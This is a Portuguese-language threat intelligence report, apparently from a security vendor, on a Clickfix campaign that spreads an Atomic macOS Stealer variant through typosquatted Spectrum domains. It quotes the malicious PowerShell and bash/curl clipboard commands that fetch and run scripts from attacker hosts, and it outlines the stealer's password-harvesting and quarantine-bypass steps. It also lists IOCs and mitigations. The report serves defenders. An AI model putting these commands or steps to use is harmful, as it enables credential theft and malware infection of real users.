🚀 A CloudSEK se torna a primeira empresa de segurança cibernética de origem indiana a receber investimentos da Estado dos EUA fundo
🚀 CloudSEK se torna a primeira empresa indiana de segurança cibernética a fazer parceria com o The Private Office
🚀 O CloudSEK aumentou Rodada da Série B1 de $19 milhões — Potencializando o futuro da cibersegurança preditiva
Voltar
Inteligência do adversário

Variante AMOS distribuída via Clickfix em campanha de entrega dinâmica com tema Spectrum por hackers que falam russo

Pesquisadores da CloudSEK descobriram uma campanha sofisticada que aproveita domínios “Spectrum” com erros de digitação para espalhar uma nova variante do Atomic macOS Stealer (AMOS). Disfarçado como uma verificação CAPTCHA, o ataque usa cargas dinâmicas personalizadas para o sistema operacional da vítima, roubando senhas, contornando a segurança do macOS e executando malware. Com comentários em russo encontrados no código e uma lógica de entrega defeituosa, a campanha reflete tanto as crescentes ambições multiplataforma quanto a execução apressada. Descubra como essa ameaça multiplataforma opera e por que sua organização deve ficar alerta.
June 4, 2025
7
min
Tabela de conteúdo
Exemplo H2
Exemplo H2

Sumário executivo

Uma nova campanha variante do Atomic macOS Stealer (AMOS) foi descoberta, aproveitando domínios com erros de digitação que imitam a Spectrum, uma provedora de telecomunicações com sede nos EUA. A campanha emprega o método Clickfix e entrega diferentes cargas com base no sistema operacional da vítima. Notavelmente, os usuários do macOS recebem um script de shell malicioso projetado para roubar senhas do sistema e baixar uma variante do AMOS para posterior exploração. O script usa comandos nativos do macOS para coletar credenciais, contornar mecanismos de segurança e executar binários maliciosos. Comentários em russo no código-fonte sugerem o envolvimento de cibercriminosos que falam russo. A lógica mal implementada nos sites de entrega, como instruções incompatíveis entre plataformas, aponta para uma infraestrutura montada às pressas. Esta campanha destaca uma tendência crescente de ataques de engenharia social em várias plataformas, direcionados tanto para consumidores quanto para usuários corporativos.

Análise

Durante o ciclo rotineiro de descoberta e atribuição da infraestrutura do atacante, descobrimos que vários sites de entrega com o tema Clickfix estavam tipoquatando a Spectrum, uma empresa com sede nos EUA que fornece serviços de televisão a cabo, acesso à Internet, segurança da Internet, serviços gerenciados, telefone celular e comunicações unificadas.

Quando a vítima clica em “Verificação alternativa”, um comando é copiado para a área de transferência e as instruções são exibidas para a vítima seguir. Assim como qualquer outra campanha do Clickfix.

No entanto, ao investigar mais a fundo, descobrimos que o site retornou respostas diferentes com base em diferentes agentes de usuário.

Área de transferência - agente de usuário não macOS

powershell -NoProfile -ExecutionPolicy Bypass -Command “$file = [System.IO.path] ::Combine ($env:Temp, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file” # Cloudflare

Esse é um dos métodos de entrega mais usados pelos usuários do Windows.

Área de transferência - agente de usuário do macOS

/bin/bash -c “$ (curl -FSSL https://applemacios[.]com/getrur/install.sh)” # Verificação do macOS #248187 autenticada pela Cloudflare. Direitos autorais Cloudflare 2025.

/bin/bash -c” ... “: Isso faz com que o sistema execute o comando dentro das aspas usando o shell Bash.

<URL>curl -FSSL:

  • -f: falha silenciosamente em erros de HTTP.
  • -s: modo silencioso (sem saída de progresso).
  • -S: Mostra o erro se -s for usado e a solicitação falhar.
  • -L: Siga os redirecionamentos.
  • Ele baixa o conteúdo do script hospedado em https://applemacios[.]com/getrur/install.sh.

A saída de curl (ou seja, o script install.sh) é executado imediatamente pelo Bash.

Conteúdo do install.sh

Coleta de senhas:

  1. Obtém o usuário atual: nome de usuário=$ (whoami)
  2. Loop de solicitação de senha: solicita continuamente “Senha do sistema:” até que a senha correta seja inserida
  3. Validação de senha: Usa dscl. -authonly para verificar a senha nos serviços de diretório do macOS
  4. Armazenamento de senhas: salva a senha válida no arquivo /tmp/.pass

Download e execução:

  1. Carga útil de downloads: curl -o /tmp/update https://applemacios[.]com/getrur/update
  2. Remove a quarentena: usa senha roubada com sudo -S xattr -c para contornar a segurança do macOS
  3. Torna executável: chmod +x/tmp/atualização
  4. Executa malware: executa o arquivo baixado /tmp/update

Ao analisar o arquivo salvo como “atualização” no diretório “tmp”, descobrimos que o malware pertence à família Atomic macOS stealer (AMOS). Variantes do AMOS, como Poseidon e Odyssey, foram vistas na natureza recentemente, ganhando força entre os cibercriminosos.

Método de entrega mais recente

Após a divulgação de suas táticas e rede pela CloudSEK, os hackers mudaram para um novo método de distribuição: anúncios maliciosos de repositórios falsificados do GitHub destinados a desenvolvedores que usam o Homebrew. (h/t Jérôme Segura - Malwarebytes)

A sequência de ataque observada reflete o caso investigado anteriormente, envolvendo um script enganoso (“install [.] sh”) que busca uma carga útil de “atualização”, que é uma variante do AMOS. O processo de infecção se desenrola da seguinte forma:

  • Malvertising/Clickfix redireciona os usuários para seus terminais.
  • Quando o script “install [.] sh” é executado, ele coleta os detalhes do usuário, solicita e verifica as senhas e as salva.
  • Posteriormente, ele recupera a carga útil da variante AMOS e a configura para inicialização automática via bash.
  • A carga útil da variante AMOS é executada automaticamente após a instalação [.] sh.

Em 6 de junho de 2025, o agente da ameaça criou o falso repositório “Homebrew”.

Esses commits estavam simplesmente sendo feitos para substituir os antigos servidores de comando e controle pelos novos.

Como podemos ver acima, o agente da ameaça removeu o C2 existente e adicionou o caminho legítimo de instalação do Homebrew (github bruto), provavelmente estabelecendo a autenticidade da publicidade maliciosa.

Posteriormente, o URL legítimo foi substituído por C2s controlados pelo atacante. Todos os IOCs do repositório foram adicionados à tabela no final deste relatório.

Atribuição

Ao inspecionar o código-fonte da página de entrega, encontramos alguns comentários em russo, indicando que o malware provavelmente está sendo espalhado por Cibercriminosos que falam russo. Usando esses comentários como ponto central, junto com outros parâmetros HTTP, conseguimos encontrar IOFAs além dos IOCs.

As páginas de entrega em questão para essa campanha variante do AMOS continham imprecisões na programação e na lógica de front-end. Para agentes de usuário Linux, um comando do PowerShell foi copiado. Além disso, a instrução “Pressione e segure a tecla Windows+R” foi exibida para usuários de Windows e Mac.

Táticas, técnicas e procedimentos

IOCs e IOFAs

Indicator Type Value Use
Domain panel-spectrum[.]net Clickfix Delivery
Domain spectrum-ticket[.]net Clickfix Delivery
Domain cf-verifi.pages[.]dev Command and Control
Domain applemacios[.]com Command and Control
MD5 Hash eaedee8fc9fe336bcde021bf243e332a AMOS Variant
URL https://cf-verifi.pages[.]dev/i.txt Contacted URLs
URL https://applemacios[.]com/getrur/install.sh Contacted URLs
URL https://applemacios[.]com/getrur/update Contacted URLs
Domain rugme[.]cat Clickfix Indicator of future attack
Domain homebrewrp[.]com Command and Control
Domain brewory[.]com Command and Control
MD5 Hash 6fd092d86235d7ae35c557523f493674 AMOS Variant

Impacto

  • Compromisso de credenciais corporativas: Ao coletar senhas de usuários do macOS, os invasores podem obter acesso a sistemas corporativos, VPNs e recursos internos, potencialmente permitindo movimentos laterais.
  • Ignorar os controles de segurança de terminais: O malware usa utilitários legítimos (dscl, sudo, xattr) para contornar os mecanismos de segurança do macOS, reduzindo a chance de detecção por soluções tradicionais de antivírus ou EDR.
  • Acesso inicial para intrusões mais amplas: As credenciais roubadas e o acesso persistente podem ser vendidos para corretores de acesso ou usados para ataques subsequentes, como ransomware ou exfiltração de dados.

Mitigações

  • Treinamento de conscientização do usuário: eduque funcionários e usuários sobre táticas de roubo de senhas, especialmente aquelas disfarçadas como solicitações de verificação do sistema.
  • Fortalecimento de endpoints do macOS: aplique proteções de integridade do sistema e restrinja a execução de scripts não assinados usando ferramentas como políticas de Gatekeeper e MDM.
  • Busca de ameaças para atividades do AMOS: monitore registros e endpoints em busca de sinais de abuso de solicitações de senha, atividade incomum de sudo e indicadores AMOS conhecidos.

Referências

Koushik Pal
Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.
Nenhum item encontrado.

Blogs relacionados

Este é um texto dentro de um bloco div.
Inteligência do adversário
March 6, 2026
7
min
AI, the Iran-US Conflict, and the Threat to US Critical Infrastructure
Leia mais
Este é um texto dentro de um bloco div.
Inteligência do adversário
March 5, 2026
5
min
A Threat Actor Landscape Assessment of ICS/OT Targeting in the 2026 Iran-US Conflict AND THE SCALE OF THE RISK
Leia mais
Este é um texto dentro de um bloco div.
Inteligência do adversário
March 3, 2026
7
min
Campanha do Trojan RedAlert: falso aplicativo de alerta de emergência espalhado por SMS falsificando o Comando da Frente Interna de Israel
Leia mais